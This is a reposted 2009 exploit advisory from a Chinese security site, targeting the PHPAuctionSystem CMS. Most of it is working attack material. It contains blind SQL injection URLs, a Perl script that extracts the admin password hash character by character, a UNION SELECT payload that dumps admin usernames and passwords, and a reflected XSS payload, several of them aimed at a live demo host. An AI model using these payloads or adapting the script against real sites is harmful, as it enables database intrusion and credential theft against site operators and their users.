首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PHPAuctionSystem (XSS/SQL) Multiple Remote Vulnerabilities
来源:andry2000@hotmail.it 作者:x0r 发布时间:2009-01-06  
#########################
#PHPAuctionSystem#
#########################
Author:x0r
Email:andry2000@hotmail.it
Cms:PhpAuctionSystemvnew
Cmsprice:$59.99
Demo:http://www.phpauctions.info/demo/
##########################

BugIn:\profile.php(Blind\Normal Sql Injection)

Exploit(Blind):
profile.php?user_id=29%20and%20substring(@@version,1,1)=5--

profile.php?user_id=29%20and%20substring(@@version,1,1)=4--
profile.php?user_id=29and+1=0--
profile.php?user_id=29and+1=1--
Perl Exploit:

#!/usr/bin/perl -w

      use strict;

      use LWP::Simple;

      my $a;

  my $host = "http://www.phpauctions.info/demo/profile.php?user_id="; #Put
the victim i've used the demo

      my @chars = (48..57, 97..102);


      for my $i(1..32) {

         foreach my $ord(@chars) {

      

         $a =
get($host."1+and+ascii(substring((select+password+from+PHPAUCTION_adminusers+where+id=10),$i,1))=$ord--");

      

         if($a =~ /coucou/i) {#put the username of the user_id=[id]

           syswrite(STDOUT,chr($ord));

           $i++;

           last;

          }

        }

      }

Sql Injection:

profile.php?user_id=-29%20union%20select%201,concat(id,char(58),username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20PHPAUCTION_adminusers--


Exploit(XSS):profile.php?user_id=29&auction_id=9[XssCode]

LiveDemo:http://www.phpauctions.info/demo/profile.php?user_id=29and
substring(@@version,1,1)=4--[False]
http://www.phpauctions.info/demo/profile.php?user_id=29and
substring(@@version,1,1)=5--[True]

LiveDemo(XSS):

http://www.phpauctions.info/demo/profile.php?user_id=29&auction_id=9<script>alert(1);</script>

Live Demo Sql:

http://www.phpauctions.info/demo/profile.php?user_id=-29%20union%20select%201,concat(id,char(58),username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20PHPAUCTION_adminusers--


Greetz:MyGirlfriend...

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·VUPlayer 2.49 (.wax File) Loca
·Safari (Arguments) Array Integ
·Joomla com_phocadocumentation
·Oracle 10g SYS.LT.REMOVEWORKSP
·oomla com_na_newsdescription (
·Oracle 10g SYS.LT.MERGEWORKSPA
·Cybershade CMS 0.2b (index.php
·Oracle 10g SYS.LT.COMPRESSWORK
·Joomla Component simple_review
·RiotPix <= 0.61 (forumid) Blin
·The Rat CMS Alpha 2 (viewartic
·Debian GNU/Linux XTERM (DECRQS
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved